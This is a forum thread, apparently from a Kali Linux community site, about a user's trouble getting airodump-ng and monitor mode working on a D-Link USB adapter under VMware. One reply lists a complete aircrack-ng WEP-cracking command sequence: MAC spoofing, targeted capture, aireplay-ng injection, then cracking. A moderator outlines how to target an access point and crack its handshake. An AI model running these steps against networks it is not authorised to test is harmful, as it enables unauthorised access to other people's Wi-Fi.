Problems with airodump-ng


Rendering Error in layout Widget/Social: Call to a member function exists() on null. Please enable debug mode for more information.
More
8 years 6 months ago #1211 by qq
Problems with airodump-ng was created by qq
I cannot find any bssid when I run airodump-ng, plus, I need some help with monitoring wlan0. Because in every tutorial I've seen, at one point they tell me to do commands with mon0 after monitoring wlan0, but the problem is it says there is no such device as mon0 but wlan0mon.
Running vmware workstation 12 pro, Kali linux 2.0. Wireless adapter: Wireless AC1200 Dual Band USB Adapter - DLink.

Screenshots:
1. gyazo.com/11fb0b7cf57957ee0bcc73fdf1a0963f - ifconfig before everything.
2. gyazo.com/14186a04ba4c0106ed89d6670923ebe9 -airmon-ng before everything.
3. gyazo.com/0465abb0b71c876878887d8f0c17747e - monitoring wlan0.
4. gyazo.com/6dc685f38b8d0e08f8290d7f56ba0464 - cant use mon0 like I said (one of the many sources - www.kalitutorials.net/2013/08/wifi-hacking-wep-kali-linux-aircrack-ng.html ).
5. gyazo.com/3390c6b65c0dfc83903cdc82c4f383f8 - ifconfig after monitoring wlan0.
6. gyazo.com/cbca51ea407d0aef3e7a7ac872f49b8b - airodump-ng part.
7. gyazo.com/63f7015e8243531819590ba3b49cddbd - vmware machine settings (Network part).


Any help? Thanks.
More
8 years 6 months ago #1215 by Min0r
Replied by Min0r on topic Problems with airodump-ng
Will you post every command you are trying, in order. I see no reason you should use "airodump-ng mon0" at all. Try this process. It has been successful for me using Kali.
airmon-ng
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

airodump-ng wlan0
airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

aircrack-ng -b (bssid) (file name-01.cap)
More
8 years 6 months ago - 8 years 6 months ago #1216 by qq
Replied by qq on topic Problems with airodump-ng
Tried everything till the airodump-ng part, heres the logs.
root@kali:~# airmon-ng
PHY	Interface	Driver		Chipset

phy0	wlan0		rtl8812au	D-Link Corp. 

root@kali:~# airmon-ng stop wlan0
PHY	Interface	Driver		Chipset

phy0	wlan0		rtl8812au	D-Link Corp. 

You are trying to stop a device that isn't in monitor mode.
Doing so is a terrible idea, if you really want to do it then you
need to type 'iw wlan0 del' yourself since it is a terrible idea.
Most likely you want to remove an interface called wlan[0-9]mon
If you feel you have reached this warning in error,
please report it.root@kali:~# ifconfig wlan0 down
root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0
Current MAC:   c4:12:f5:1c:a4:be (unknown)
Permanent MAC: c4:12:f5:1c:a4:be (unknown)
New MAC:       00:11:22:33:44:55 (CIMSYS Inc)
Network driver didn't actually change to the new MAC!!
root@kali:~# airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
  813 NetworkManager
  984 wpa_supplicant
 1028 avahi-daemon
 1035 avahi-daemon
 1428 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		rtl8812au	D-Link Corp. command failed: Operation not supported (-95)

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)


root@kali:~# airodump-ng wlan0
Interface wlan0: 
ioctl(SIOCGIFINDEX) failed: No such device
root@kali:~# lsusb
Bus 001 Device 002: ID 2001:3315 D-Link Corp. 
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Thanks
Last edit: 8 years 6 months ago by qq.
More
8 years 6 months ago #1217 by Min0r
More
8 years 6 months ago #1222 by thaGH05T
Replied by thaGH05T on topic Problems with airodump-ng

SpoiL wrote: I cannot find any bssid when I run airodump-ng, plus, I need some help with monitoring wlan0. Because in every tutorial I've seen, at one point they tell me to do commands with mon0 after monitoring wlan0, but the problem is it says there is no such device as mon0 but wlan0mon.
Running vmware workstation 12 pro, Kali linux 2.0. Wireless adapter: Wireless AC1200 Dual Band USB Adapter - DLink.

Screenshots:
1. gyazo.com/11fb0b7cf57957ee0bcc73fdf1a0963f - ifconfig before everything.
2. gyazo.com/14186a04ba4c0106ed89d6670923ebe9 -airmon-ng before everything.
3. gyazo.com/0465abb0b71c876878887d8f0c17747e - monitoring wlan0.
4. gyazo.com/6dc685f38b8d0e08f8290d7f56ba0464 - cant use mon0 like I said (one of the many sources - www.kalitutorials.net/2013/08/wifi-hacking-wep-kali-linux-aircrack-ng.html ).
5. gyazo.com/3390c6b65c0dfc83903cdc82c4f383f8 - ifconfig after monitoring wlan0.
6. gyazo.com/cbca51ea407d0aef3e7a7ac872f49b8b - airodump-ng part.
7. gyazo.com/63f7015e8243531819590ba3b49cddbd - vmware machine settings (Network part).


Any help? Thanks.


Please post all your pics on here so we do not have to continuously go from page to page. You will understand one day if YOU are moderating a forum ;)
More
8 years 6 months ago #1223 by thaGH05T
Replied by thaGH05T on topic Problems with airodump-ng
OK, so the biggest caveat to using Kali 2.0 right now for you is you cannot follow my older tutorials :) The Aircrack suite has a lot of syntax changes that need to be payed attention to. The basic theory has not changed so I can leave you with this.

Step 1 - Place your wireless card into monitor mode.
Step 2 - Scan for all access points.
Step 3 - Target an access point and form your plan of attack. e.g. WEP WPA WPA2
Step 4 - get the handshake or IV's and move on to cracking.

There's a lot more to it then that but you need to keep those steps in mind. I have no doubt you will figure it out. and when you do, please post a tutorial here in the Kali section and give back to the community :)

Who's Online

We have 717 guests and no members online

N00BZ

  • ljamal
  • ljamal74
  • mikeg2atest
  • ducchinhbui
  • anjarezt

Cookies